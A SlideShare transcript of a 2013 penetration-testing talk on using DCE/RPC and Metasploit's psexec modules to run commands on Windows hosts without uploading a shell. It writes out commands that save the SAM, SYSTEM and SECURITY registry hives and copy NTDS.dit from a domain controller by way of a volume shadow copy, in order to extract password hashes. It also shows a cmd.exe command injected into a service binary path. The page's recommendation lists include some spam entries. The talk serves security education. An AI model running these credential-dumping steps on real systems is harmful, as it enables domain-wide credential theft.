SlideShare a Scribd company logo

So you want to be a security expert

Download as PPTX, PDF
Royce Davis
Royce Davis

Talk from Texas State University Cyber Security Awareness Day.

Technology
1 of 24
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. So, You Want To Be A “Security Expert” Fun Tools For Penetration Testing
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Husband & Father • Accuvant LABS: Senior Consultant • (A.K.A Pen Tester) • Cofounder: http://www.pentestgeek.com • Author: jigsaw.rb • Twitter: @R3dy__ Who Is Royce Davis?
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Penetration Testing == Offensive Security • Uploading Shells Is No Good • Techniques to avoid shell upload • Metasploit Modules • Command execution • Local & Cached hash dumping • Fun With Domain Controllers What Are You Talking About?
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Wikipedia Definition: • “a method of evaluating computer and network security by simulating an attack on a computer system or network from external and internal threats.” What Is A Pen Test? Not that kind of pen…
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. The All Powerful Shell • What is a shell exactly?
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • We‟ve been uploading shells to take control of remote hosts since the beginning of time so what‟s the big deal? • Shells contain binary signatures that can be recognized and blocked • Obfuscation only creates a different signature • Shells can die leaving us with no way back in • They can also leave remnants of themselves Uploading Shells Is No Good
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Why bother with a shell in the first place? • Command execution • Search the file system • Create users • Enumerate network resources • Upload/download files • Etc… • Grab local/cached password hashes • Dump all AD hashes from the DC • “password” = 8846f7eaee8fb117ad06bdd830b7586c • How can we do stuff without a shell??? What Can We Do With A Shell?
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. The Answer Is DCE/RPC Distributed Computing Environment / Remote Procedure Calls Book: DCE/RPC Over SMB – SAMBA and Windows NT* Domain Internals Author: Luke Kenneth Casson Leighton • Remotely interact with Windows API • Supported by all versions of Windows • Often left unsecured
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Enter ‘psexec.rb’ • /exploit/windows/smb/psexec.rb • Creates & Uploads a binary payload to the target over SMB • Sends an RPC to the Service Control Manager (SCM) • UUID: „367abb81-9844-35f1-ad32-98f038001003‟ • Creates a service, starts it, cleans up after… • MSDN Documentation • http://msdn.microsoft.com/en- us/library/windows/desktop/ms685942%28v=vs.85%29.aspx Using Native Windows Functions
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. DCERPC Requests: The dcerpc.call instance method takes in two parameters. The first parameter is the opcode reference to the particular Windows function you wish to call. The second parameter is the function arguments in NDR (Network Data Representation) Format. • dcerpc.call(0x0f, stubdata) – OpenSCManager • dcerpc.call(0x0c, stubdata) – CreateService • dcerpc.call(0x0, svc_handle) – CloseServiceHandle • dcerpc.call(0x10, stubdata) – OpenService • dcerpc.call(0x13, stubdata) – StartService • dcerpc.call(0x02, stubdata) – DeleteService • dcerpc.call(0x0, svc_handle) - CloseServiceHandle Inside psexec.rb
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • This is what it looks like inside Metasploit‟s psexec exploit module written by HDM Psexec.rb Cont. exploit/windows/smb/psexec.rb (line 254)
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • This is the format accepted by the CreateService function • http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450%28v=vs.85%29.aspx CreateService Windows Func.
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • lpBinaryPathName [in, optional] • The fully qualified path to the service binary file. If the path contains a space, it must be quoted so that it is correctly interpreted. For example, "d:my sharemyservice.exe" should be specified as ""d:my sharemyservice.exe"". • The path can also include arguments for an auto-start service. For example, "d:mysharemyservice.exe arg1 arg2". These arguments are passed to the service entry point (typically the main function). • If you specify a path on another computer, the share must be accessible by the computer account of the local computer because this is the security context used in the remote call. However, this requirement allows any potential vulnerabilities in the remote computer to affect the local computer. Therefore, it is best to use a local file. • psexec.rb looks like this: • C:HjeKOplsYutVmBWn.exe  Probably a Meterpreter payload • What if we tried this instead: • C:windowssystem32cmd.exe /C echo dir C: ^> outputfile.txt > launchfile.bat & C:windowssystem32cmd.exe /C launchfile.bat” lpBinaryPathName MSDN Definition
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. In order to provide accessibility to this functionality for other modules we created a mixin which has been graciously accepted into the MSF. lib/msf/core/exploit/smb/psexec.rb • Slightly modified version of the original psexec.rb code wrapped in a function which excepts a Windows command in the following format: • [PATH TO cmd.exe] [/C] [INSERT WINDOWS COMMAND] • The method is called like so „return psexec(command)‟ • Returns „true‟ if execution was successful • Major difference is it does not try to delete cmd.exe after execution • Also contains a „smb_read_file(smbshare, host, file)‟ method for convenient retrieval of command output The Psexec Mixin
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Command Execution
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Current methods for dumping password hashes • Post modules that require a meterpreter shell • Upload a standalone binary like pwdump/fgdump… • These methods extract specific registry key values from the SYSTEM, SECURITY, and/or SAM registry hive (This process can flag antivirus) • We need to somehow retrieve a copy of the registry hives and extract the hashes from them offline Dumping Password Hashes
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. 1. Authenticate to the system using a password/hash 2. Use the psexec mixin to execute the following Windows Commands: • reg.exe save HKLMSAM c:windowstempsam • reg.exe save HKLMSYSTEM c:windowstempsys • reg.exe save HKLMSECURITY c:windowstempsec 3. Download the registry hive copies to our attacking machine 4. Remove the registry hive copies from the target 5. Open the registry hive copies on our attacking machine and extract the password hashes Offline Password Hash Dumping
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Local & Cached Hash Extraction • Local Hashes • Domain Cached Hashes
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • The holy grail of most network pentests can be found inside an ESE (Extensible Storage Engine) database called NTDS.dit located on the Domain Controller • Protected by operating system • Requires inject into lsass and/or other black magics • Contains a BOAT LOAD of information about the system • Including password hashes and usernames for all AD accounts! Dumping All the Hashes
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. We can use the psexec_ntdsgrab module to create or target an existing VSC (Volume Shadow Copy) and safely pull down a copy of NTDS.dit to our attacking machine. auxiliary/admin/smb/psexec_ntdsgrab.rb 1. Use psexec mixin to execute windows commands for creating a VSC • vssadmin create shadow /For=%SYSTEMDRIVE% 2. Query vssadmin for the path to the newly created VSC • vssadmin list shadows 3. Copy NTDS.dit from the VSC to the WINDOWSTemp directory • copy /Y ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WINDOWSNTDSNTDS.dit C:WINDOWSTempntds 4. Use reg.exe to make a copy of the SYSTEM registry hive 5. Download the „ntds‟ and „sys‟ files to attacking machine 6. Cleanup after ourselves Enter psexec_ntdsgrab.rb
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • We‟ll need to use the „libesedb‟ C library to extract the right tables from NTDS.dit • $ wget https://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz$ • $ tar xvzf libesedb-alpha-20120102.tar.gz • $ cd libesedb-20120102/ • $ ./configure • $ make && make install • Once libesedb is compiled we will use esedbexport located in the „libesedb-20120102/esedbtools‟ to export the datatable which contains the user account password hashes for AD • http://www.pentestgeek.com/2012/11/16/dumping-domain- password-hashes-using-metasploit-ntds_hashextract-rb/ Getting What We Want From NTDS.dit
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Uploading a binary shell to the target can be harmful to a penetration test • DCERPC allows us to do a lot of the functions we would ask of a binary shell without uploading one to the target • Metasploit modules already exist to achieve remote command execution, grab local/cached password hashes and dump AD hashes from a DC • The sky is the limit as to what else we could do if we all chose to adapt this style of thinking Closing
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Any Questions? 10/9/201322
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. So, You Want To Be A “Security Expert” 10/9/201323 Thank You! Royce Davis Accuvant LABS Senior Consultant – Attack & Pen Team royce.e.davis@gmail.com http://www.pentestgeek.com @R3dy__

Recommended

Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access darkRoyce Davis
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2Royce Davis
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the GapWill Schroeder
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headersColdFusionConference
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Alexander Polce Leary
 

Recommended

Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access darkRoyce Davis
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2Royce Davis
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the GapWill Schroeder
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headersColdFusionConference
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Alexander Polce Leary
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseWill Schroeder
 
Infrastructure as code: running microservices on AWS using Docker, Terraform,...
Infrastructure as code: running microservices on AWS using Docker, Terraform,...Infrastructure as code: running microservices on AWS using Docker, Terraform,...
Infrastructure as code: running microservices on AWS using Docker, Terraform,...Yevgeniy Brikman
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the TorchWill Schroeder
 
Unity Makes Strength
Unity Makes StrengthUnity Makes Strength
Unity Makes StrengthXavier Mertens
 
Modern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDModern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDSean Chittenden
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the SleeveWill Schroeder
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Cassandra and security
Cassandra and securityCassandra and security
Cassandra and securityBen Bromhead
 
Production Readiness Strategies in an Automated World
Production Readiness Strategies in an Automated WorldProduction Readiness Strategies in an Automated World
Production Readiness Strategies in an Automated WorldSean Chittenden
 
Nessus and Reporting Karma
Nessus and Reporting KarmaNessus and Reporting Karma
Nessus and Reporting Karman|u - The Open Security Community
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsWill Schroeder
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Как мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияКак мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияPositive Hack Days
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedWill Schroeder
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
Insecurity-In-Security version.1 (2010)
Insecurity-In-Security version.1 (2010)Insecurity-In-Security version.1 (2010)
Insecurity-In-Security version.1 (2010)Abhishek Kumar
 
(Don't) Go Tracing Server Calls
(Don't) Go Tracing Server Calls(Don't) Go Tracing Server Calls
(Don't) Go Tracing Server CallsBrandon Hunter
 

More Related Content

What's hot

Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseWill Schroeder
 
Infrastructure as code: running microservices on AWS using Docker, Terraform,...
Infrastructure as code: running microservices on AWS using Docker, Terraform,...Infrastructure as code: running microservices on AWS using Docker, Terraform,...
Infrastructure as code: running microservices on AWS using Docker, Terraform,...Yevgeniy Brikman
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the TorchWill Schroeder
 
Modern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDModern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDSean Chittenden
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Cassandra and security
Cassandra and securityCassandra and security
Cassandra and securityBen Bromhead
 
Production Readiness Strategies in an Automated World
Production Readiness Strategies in an Automated WorldProduction Readiness Strategies in an Automated World
Production Readiness Strategies in an Automated WorldSean Chittenden
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsWill Schroeder
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Как мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияКак мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияPositive Hack Days
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedWill Schroeder
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 

What's hot (20)

Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
 
Infrastructure as code: running microservices on AWS using Docker, Terraform,...
Infrastructure as code: running microservices on AWS using Docker, Terraform,...Infrastructure as code: running microservices on AWS using Docker, Terraform,...
Infrastructure as code: running microservices on AWS using Docker, Terraform,...
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
Unity Makes Strength
Unity Makes StrengthUnity Makes Strength
Unity Makes Strength
 
Modern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDModern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSD
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Cassandra and security
Cassandra and securityCassandra and security
Cassandra and security
 
Production Readiness Strategies in an Automated World
Production Readiness Strategies in an Automated WorldProduction Readiness Strategies in an Automated World
Production Readiness Strategies in an Automated World
 
Nessus and Reporting Karma
Nessus and Reporting KarmaNessus and Reporting Karma
Nessus and Reporting Karma
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerTools
 
Open source security
Open source securityOpen source security
Open source security
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
Как мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияКак мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управления
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 

Similar to So you want to be a security expert

Insecurity-In-Security version.1 (2010)
Insecurity-In-Security version.1 (2010)Insecurity-In-Security version.1 (2010)
Insecurity-In-Security version.1 (2010)Abhishek Kumar
 
(Don't) Go Tracing Server Calls
(Don't) Go Tracing Server Calls(Don't) Go Tracing Server Calls
(Don't) Go Tracing Server CallsBrandon Hunter
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraftenigma0x3
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
 
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)Codemotion
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsGianluca Varisco
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
 
Windows Malware Techniques
Windows Malware TechniquesWindows Malware Techniques
Windows Malware TechniquesLee C
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedOctavio Paguaga
 
Instaclustr: Securing Cassandra
Instaclustr: Securing CassandraInstaclustr: Securing Cassandra
Instaclustr: Securing CassandraDataStax Academy
 
Securing Cassandra
Securing CassandraSecuring Cassandra
Securing CassandraInstaclustr
 
Resilience Testing
Resilience Testing Resilience Testing
Resilience Testing Ran Levy
 
Securing Cassandra The Right Way
Securing Cassandra The Right WaySecuring Cassandra The Right Way
Securing Cassandra The Right WayDataStax Academy
 
Q Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - ConjurQ Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - Conjurconjur_inc
 
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015Ajin Abraham
 
Using puppet
Using puppetUsing puppet
Using puppetAlex Su
 

Similar to So you want to be a security expert (20)

Insecurity-In-Security version.1 (2010)
Insecurity-In-Security version.1 (2010)Insecurity-In-Security version.1 (2010)
Insecurity-In-Security version.1 (2010)
 
(Don't) Go Tracing Server Calls
(Don't) Go Tracing Server Calls(Don't) Go Tracing Server Calls
(Don't) Go Tracing Server Calls
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraft
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applications
 
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
 
Rails Security
Rails SecurityRails Security
Rails Security
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Windows Malware Techniques
Windows Malware TechniquesWindows Malware Techniques
Windows Malware Techniques
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
 
Instaclustr: Securing Cassandra
Instaclustr: Securing CassandraInstaclustr: Securing Cassandra
Instaclustr: Securing Cassandra
 
Securing Cassandra
Securing CassandraSecuring Cassandra
Securing Cassandra
 
Resilience Testing
Resilience Testing Resilience Testing
Resilience Testing
 
Securing Cassandra The Right Way
Securing Cassandra The Right WaySecuring Cassandra The Right Way
Securing Cassandra The Right Way
 
Q Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - ConjurQ Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - Conjur
 
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
 
Using puppet
Using puppetUsing puppet
Using puppet
 

Recently uploaded

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
A Domino Admins Adventures (Engage 2024)
